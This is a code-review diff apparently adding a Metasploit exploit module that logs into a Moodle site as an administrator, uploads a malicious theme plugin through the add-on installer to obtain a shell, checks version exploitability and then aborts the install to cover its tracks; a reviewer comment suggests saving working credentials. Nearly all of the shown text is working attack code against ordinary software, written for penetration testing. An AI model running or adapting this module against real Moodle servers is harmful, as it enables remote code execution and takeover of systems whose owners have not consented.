modules/exploits/multi/http/moodle_admin_shell_upload.rb

```diff
@@ -0,0 +1,244 @@
+      'keep_cookies' => true,
+      'vars_post' => {
+        'sesskey' => @sesskey,
+        '_qf__tool_installaddon_installfromzip_form' => '1',
+        'mform_showmore_id_general' => '0',
+        'mform_isexpanded_id_general' => '1',
+        'zipfile' => @zipfile,
+        'plugintype' => 'theme',
+        'rootdir' => '',
+        'submitbutton' => 'Install+plugin+from+the+ZIP+file'
+      }
+    )
+
+    unless res.body =~ /installzipstorage/
+      fail_with(Failure::NoAccess, 'Install not successful')
+    end
+    print_good('Plugin successfully integrated!')
+    storage = res.body.split('installzipstorage=')[1].split('&')[0]
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'installzipcomponent' => "theme_#{@plugin_name}",
+        'installzipstorage' => storage,
+        'installzipconfirm' => '1',
+        'sesskey' => @sesskey
+      }
+    )
+  end
+
+  def clean
+    print_status('Uninstalling plugin')
+    if @version < Rex::Version.new('3.9.0')
+      send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
+        'keep_cookies' => true,
+        'vars_post' => {
+          'cache' => '0',
+          'confirmplugincheck' => '0',
+          'abortinstallx' => '1',
+          'confirmabortinstall' => '1',
+          'sesskey' => @sesskey
+        }
+      })
+    else
+      send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
+        'keep_cookies' => true,
+        'vars_post' => {
+          'cache' => '0',
+          'confirmrelease' => '1',
+          'confirmplugincheck' => '0',
+          'abortinstallx' => "theme_#{@plugin_name}",
+          'confirmabortinstall' => '1',
+          'sesskey' => @sesskey
+        }
+      })
+    end
+  end
+
+  def check
+    v = moodle_version
+    return CheckCode::Detected('Unable to determine moodle version') if v.nil?
+
+    # This is a feature, not a vuln, so we assume this to work on 3.0.0+
+    # assuming the plugin arch changed before that.
+    # > 3.0, < 3.9
+    @version = Rex::Version.new(v)
+    if @version > Rex::Version.new('3.0.0')
+      return CheckCode::Appears("Exploitable Moodle version #{v} detected")
+    end
+
+    CheckCode::Safe("Non-exploitable Moodle version #{v} detected")
+  end
+
+  def exploit
+    print_status("Authenticating as user: #{datastore['USERNAME']}")
+    cookies = moodle_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::NoAccess, 'Unable to login. Check credentials') if cookies.nil? || cookies.empty?
+    cookies.each do |cookie|
+      cookie_jar.add(cookie)
+    end
+
+    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
```

Comment:
Maybe add the good cred to the database?  See `store_valid_credential(usename, password)`